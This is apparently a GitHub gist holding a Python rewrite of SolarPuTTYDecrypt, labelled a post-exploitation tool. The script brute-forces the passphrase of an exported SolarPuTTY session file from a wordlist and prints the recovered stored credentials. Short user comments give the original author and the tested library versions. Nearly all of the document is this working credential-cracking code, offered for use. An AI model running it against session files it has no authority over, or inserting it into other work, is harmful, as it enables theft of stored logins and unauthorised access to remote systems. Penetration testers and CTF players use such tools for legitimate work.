
@xHacka
Last active November 9, 2024 23:03
SolarPuTTYDecrypt: A post-exploitation tool to decrypt SolarPuTTY's session files, rewritten in Python. Original Author: Paolo Stagno (@Void_Sec - voidsec.com)
import base64
import sys
from Crypto.Cipher import DES3
from Crypto.Protocol.KDF import PBKDF2
def decrypt(passphrase, ciphertext):
    """Decrypt a base64-encoded session blob with a candidate passphrase.

    Layout read from the decoded blob: bytes 0-23 are the PBKDF2 salt,
    bytes 24-31 the CBC IV, and everything from offset 48 onward is the
    Triple DES ciphertext. Bytes 32-47 are not used by this function.

    The key is derived with PBKDF2 using only 1000 iterations, so each
    guess is cheap: an exported session file is no stronger than the
    password chosen for it and should be handled as credential material.

    Nothing here authenticates the result. A wrong passphrase normally
    produces garbage text rather than an error, so the caller has to
    recognise a correct decryption itself.

    Args:
        passphrase: Candidate password for the export.
        ciphertext: Base64 text of the encrypted session file.

    Returns:
        The ASCII characters of the unpadded plaintext, or '' when any
        step raised (the error is printed, not propagated).
    """
    try:
        blob = base64.b64decode(ciphertext)
        salt, iv, body = blob[:24], blob[24:32], blob[48:]

        # 24-byte key for three-key Triple DES, 1000 PBKDF2 rounds.
        key = PBKDF2(passphrase, salt, dkLen=24, count=1000)
        plain = DES3.new(key, DES3.MODE_CBC, iv).decrypt(body)

        # The final byte is trusted as the PKCS7 pad length without being
        # validated; a value of 0 slices the plaintext down to nothing.
        plain = plain[:-plain[-1]]

        # Keep code points below 128 only, dropping every non-ASCII byte.
        return ''.join(map(chr, filter(lambda b: b < 128, plain)))
    except Exception as e:
        print(f'Error: {e}')
        return ''
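# Command-line driver: read the encrypted session export, then try each line
# of the wordlist as the passphrase until the decrypted text contains the
# marker 'Credentials'.
if len(sys.argv) < 3:
    print(f'Usage: {sys.argv[0]} putty_session.dat wordlist.txt')
    # sys.exit() is always available; the bare exit() helper is installed by
    # the site module and is absent under `python -S`.
    sys.exit(1)

# The session file is read as text because decrypt() expects base64.
with open(sys.argv[1]) as f:
    cipher = f.read()

with open(sys.argv[2]) as passwords:
    for i, password in enumerate(passwords):
        password = password.strip()
        decrypted = decrypt(password, cipher)
        # Progress line, overwritten in place by the carriage return.
        print(f'[{i}] {password=}', end='\r')
        # decrypt() has no integrity check, so success is inferred from a
        # plain substring test on the output.
        if 'Credentials' in decrypted:
            # Trailing spaces wipe leftovers of a longer progress line.
            print(f'\r[{i}] {password=} {" " * 10}')
            print()
            print(decrypted)
            break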
@xHacka
Author

xHacka commented Oct 12, 2024

More info:

Original Author: Paolo Stagno (@Void_Sec - voidsec.com)

@xHacka
Author

xHacka commented Oct 13, 2024

Tested with:

➜ pip freeze | sls crypto

cryptography==41.0.5
pycryptodome==3.21.0

@datboi6942

oh thank god, i was banging my head against the wall trying to use dotnet

@CyberDiogenex

Thank the lord
